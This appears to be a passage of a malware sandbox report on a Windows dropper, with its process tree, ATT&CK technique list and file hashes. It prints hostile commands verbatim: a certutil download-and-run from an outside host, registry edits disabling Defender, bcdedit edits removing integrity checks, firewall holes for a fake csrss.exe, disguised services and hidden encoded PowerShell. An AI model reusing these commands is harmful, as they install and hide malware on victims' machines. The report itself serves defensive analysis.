PID 2020 wrote to memory of 1528	2020	Files.exe	jfiag3g_gg.exe
PID 2020 wrote to memory of 1528	2020	Files.exe	jfiag3g_gg.exe
PID 428 wrote to memory of 1312	428	Graphics.exe	cmd.exe
PID 428 wrote to memory of 1312	428	Graphics.exe	cmd.exe
PID 428 wrote to memory of 1312	428	Graphics.exe	cmd.exe
PID 428 wrote to memory of 1312	428	Graphics.exe	cmd.exe
PID 1312 wrote to memory of 872	1312	cmd.exe	netsh.exe
PID 1312 wrote to memory of 872	1312	cmd.exe	netsh.exe
PID 1312 wrote to memory of 872	1312	cmd.exe	netsh.exe
PID 428 wrote to memory of 840	428	Graphics.exe	csrss.exe
PID 428 wrote to memory of 840	428	Graphics.exe	csrss.exe

C:\Users\Admin\AppData\Local\Temp\cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
"C:\Users\Admin\AppData\Local\Temp\cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:1468

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies data under HKEY_USERS
PID:872

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1268

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
5⤵
- Creates scheduled task(s)
PID:928

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:836

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:2808

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:1196

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:632

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:3000

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:2112

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:2900

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:2304

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:2568

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:2536

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:2648

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:2428

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:2152

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:2532

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:2512

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
PID:1152

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3036

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:1164

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2020

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1564

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1528

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:972

C:\Users\Admin\Pictures\Adobe Films\k7D0g8NM08633xtjv4iGBCZw.exe
"C:\Users\Admin\Pictures\Adobe Films\k7D0g8NM08633xtjv4iGBCZw.exe"
3⤵
- Executes dropped EXE
PID:2072

C:\Users\Admin\Pictures\Adobe Films\je4UrxDMZO_PWbRkE5E29E3t.exe
"C:\Users\Admin\Pictures\Adobe Films\je4UrxDMZO_PWbRkE5E29E3t.exe"
3⤵
- Executes dropped EXE
PID:2192

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2692

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2180

C:\Users\Admin\Documents\q3Gx3T4A5u44KM5WjEDCgRFc.exe
"C:\Users\Admin\Documents\q3Gx3T4A5u44KM5WjEDCgRFc.exe"
4⤵
PID:2696

C:\Users\Admin\Pictures\Adobe Films\PUC2rv9TQnElnu7bjl8s8OWk.exe
"C:\Users\Admin\Pictures\Adobe Films\PUC2rv9TQnElnu7bjl8s8OWk.exe"
3⤵
- Executes dropped EXE
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im PUC2rv9TQnElnu7bjl8s8OWk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\PUC2rv9TQnElnu7bjl8s8OWk.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2184

C:\Windows\SysWOW64\taskkill.exe
taskkill /im PUC2rv9TQnElnu7bjl8s8OWk.exe /f
5⤵
- Kills process with taskkill
PID:1064

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:1200

C:\Users\Admin\Pictures\Adobe Films\iTKXKd2CkhjXXWhcfQ3bSfYo.exe
"C:\Users\Admin\Pictures\Adobe Films\iTKXKd2CkhjXXWhcfQ3bSfYo.exe"
3⤵
- Executes dropped EXE
PID:2232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "iTKXKd2CkhjXXWhcfQ3bSfYo.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\iTKXKd2CkhjXXWhcfQ3bSfYo.exe" & exit
4⤵
PID:2792

C:\Users\Admin\Pictures\Adobe Films\fMMQO1c_SPfeXHPv8JTKtqY4.exe
"C:\Users\Admin\Pictures\Adobe Films\fMMQO1c_SPfeXHPv8JTKtqY4.exe"
3⤵
- Executes dropped EXE
PID:2244

C:\Users\Admin\Pictures\Adobe Films\2E5ZH7XjOjT1D_2bK2Mz4sCQ.exe
"C:\Users\Admin\Pictures\Adobe Films\2E5ZH7XjOjT1D_2bK2Mz4sCQ.exe"
3⤵
- Executes dropped EXE
PID:2264

C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe
"C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe"
3⤵
PID:2336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xeioteuk\
4⤵
PID:2492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rzusqfap.exe" C:\Windows\SysWOW64\xeioteuk\
4⤵
PID:2240

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create xeioteuk binPath= "C:\Windows\SysWOW64\xeioteuk\rzusqfap.exe /d\"C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:2192

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description xeioteuk "wifi internet conection"
4⤵
PID:1356

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start xeioteuk
4⤵
PID:1672

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:2472

C:\Users\Admin\Pictures\Adobe Films\qAz7o2wBr_2nLArICTw_3Q3b.exe
"C:\Users\Admin\Pictures\Adobe Films\qAz7o2wBr_2nLArICTw_3Q3b.exe"
3⤵
PID:2472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:2876

C:\Users\Admin\Pictures\Adobe Films\7CILRlZKoAk7CmN6khlCwZXF.exe
"C:\Users\Admin\Pictures\Adobe Films\7CILRlZKoAk7CmN6khlCwZXF.exe"
3⤵
PID:2560

C:\Users\Admin\AppData\Local\Temp\7zS3765.tmp\Install.exe
.\Install.exe
4⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\7zS513C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:2868

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:3044

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:3012

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:3028

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2440

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:2760

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:2792

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:968

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkGWbyXfh" /SC once /ST 03:38:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:2852

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkGWbyXfh"
6⤵
PID:2788

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gkGWbyXfh"
6⤵
PID:2672

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\NxdfrFl.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:2952

C:\Users\Admin\Pictures\Adobe Films\mDKIC_JaLGdwjCFdL3i8ITIn.exe
"C:\Users\Admin\Pictures\Adobe Films\mDKIC_JaLGdwjCFdL3i8ITIn.exe"
3⤵
PID:2520

C:\Users\Admin\Pictures\Adobe Films\yShp_yeyPx0JL4_TASAhHf_U.exe
"C:\Users\Admin\Pictures\Adobe Films\yShp_yeyPx0JL4_TASAhHf_U.exe"
3⤵
PID:2464

C:\Users\Admin\Pictures\Adobe Films\F1tQ9fZeBOsjf1HbTroOxz21.exe
"C:\Users\Admin\Pictures\Adobe Films\F1tQ9fZeBOsjf1HbTroOxz21.exe"
3⤵
PID:2456

C:\Users\Admin\Pictures\Adobe Films\pYB1MuTIRSyTnJ3ToM9tHDpY.exe
"C:\Users\Admin\Pictures\Adobe Films\pYB1MuTIRSyTnJ3ToM9tHDpY.exe"
3⤵
PID:2420

C:\Users\Admin\Pictures\Adobe Films\Phi7YJEGhpKnkmz2scMkiP1F.exe
"C:\Users\Admin\Pictures\Adobe Films\Phi7YJEGhpKnkmz2scMkiP1F.exe"
3⤵
PID:2412

C:\Users\Admin\Pictures\Adobe Films\6ac7yeCSinoAQH2LnzSazko4.exe
"C:\Users\Admin\Pictures\Adobe Films\6ac7yeCSinoAQH2LnzSazko4.exe"
3⤵
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 420
4⤵
- Program crash
PID:2508

C:\Users\Admin\Pictures\Adobe Films\hstJIb2kvtuMog1Bt9hR61Mi.exe
"C:\Users\Admin\Pictures\Adobe Films\hstJIb2kvtuMog1Bt9hR61Mi.exe"
3⤵
PID:2372

C:\Users\Admin\AppData\Local\Temp\c02af023-effe-4ef1-bb57-42cf1977090a.exe
"C:\Users\Admin\AppData\Local\Temp\c02af023-effe-4ef1-bb57-42cf1977090a.exe"
4⤵
PID:2536

C:\Users\Admin\Pictures\Adobe Films\8xP7p9G9WU4CbDRf2C4BGqIo.exe
"C:\Users\Admin\Pictures\Adobe Films\8xP7p9G9WU4CbDRf2C4BGqIo.exe"
3⤵
PID:2364

C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe
"C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe"
3⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1568

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220314050742.log C:\Windows\Logs\CBS\CbsPersist_20220314050742.cab
1⤵
- Drops file in Windows directory
PID:928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:2608

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:2676

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
3⤵
PID:2496

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
3⤵
PID:2764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
3⤵
PID:2164

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "iTKXKd2CkhjXXWhcfQ3bSfYo.exe" /f
1⤵
- Kills process with taskkill
PID:2940

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
PID:2908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
PID:2920

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
PID:2928

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
1⤵
PID:2260

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
1⤵
- Enumerates processes with tasklist
PID:2256

C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe
"C:\Users\Admin\Pictures\Adobe Films\qKlQzA06rwnd_YZXoLE6OPAX.exe"
1⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 192
2⤵
- Program crash
PID:2120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
PID:2884

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
1⤵
PID:2712

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
1⤵
- Enumerates processes with tasklist
PID:2704

C:\Windows\SysWOW64\xeioteuk\rzusqfap.exe
C:\Windows\SysWOW64\xeioteuk\rzusqfap.exe /d"C:\Users\Admin\Pictures\Adobe Films\naZYMpYL2l_9aJ0DIr2tKs4_.exe"
1⤵
PID:2404

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2256

C:\Windows\system32\taskeng.exe
taskeng.exe {2616AD46-FEAC-4D09-A5E5-7B95921F5DEA} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]
1⤵
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
PID:2688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
897a4a30a7d54041daf90c4753ec7d0b

SHA1
cb3a52b14009aa2edb6bc617fcc2437b2f271fdf

SHA256
336f1d8ca1dc8064425af428e46b1c3724b16a2dacb765ce29bc34ca731e446d

SHA512
ce12ca5a025bf7a0041d72de8626412e33cb8dc0fb19dd9d60e52e7bc3e6f63c0931c61a6e89920f9f589b3098fad1aa7eb9bbfd307cdd460f58256911835c43

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
fb0a411f9683bf0bb1884afd509a7300

SHA1
7d2496d1908c030909d8945a19e145ccb0c36c00

SHA256
5bc6a35a61345c73b04ac2c3bd511166997b0c94d24e1076f4dd76c27a64a740

SHA512
68e7492a4155e80a456cbb5709033c8d5689c70f9f4c8b342c7d08d99dfb34c46242f9a638c1bed149b76e96b86ffb40a081e9b59fcbbfe153d08ad36ad5cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
70aae7cb1d740226a0092f03d91198ac

SHA1
d7403661766b9c71b7077e46521e520fba8079ec

SHA256
2ddab1335ab3520e0ed44f1d2b5902da77b659ed22d2ecbc3bf858f77084e8d3

SHA512
062cf2526603787463f3fe5e8aadaad2543fc3800c22a9cf404e91745015ca7d4b4546258b0e1f2cbfcd148d169ee772b1defdc24191f90955fadb2e1b444dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
340a317a21e1cb74aa29e7b696f6ca41

SHA1
91eebd0d2d105fc014736237904c2833e4b41679

SHA256
8f0e52d7745f0acd774eefed66848ac62651022001dc8561f769f4b365e6db6f

SHA512
7841b7cfed3136f0f8414836bad838a24bd41143f48665921eaab401cae262a5a0b4126890dded5064a6f757c7c03af4aac87456e4519b570cd4fe7fcf3d8c75

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
340a317a21e1cb74aa29e7b696f6ca41

SHA1
91eebd0d2d105fc014736237904c2833e4b41679

SHA256
8f0e52d7745f0acd774eefed66848ac62651022001dc8561f769f4b365e6db6f

SHA512
7841b7cfed3136f0f8414836bad838a24bd41143f48665921eaab401cae262a5a0b4126890dded5064a6f757c7c03af4aac87456e4519b570cd4fe7fcf3d8c75

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
ccea7df920e067ff02a85fddf668b9ce

SHA1
e91133acbc4c91bf738bd6170d0547f2378e366f

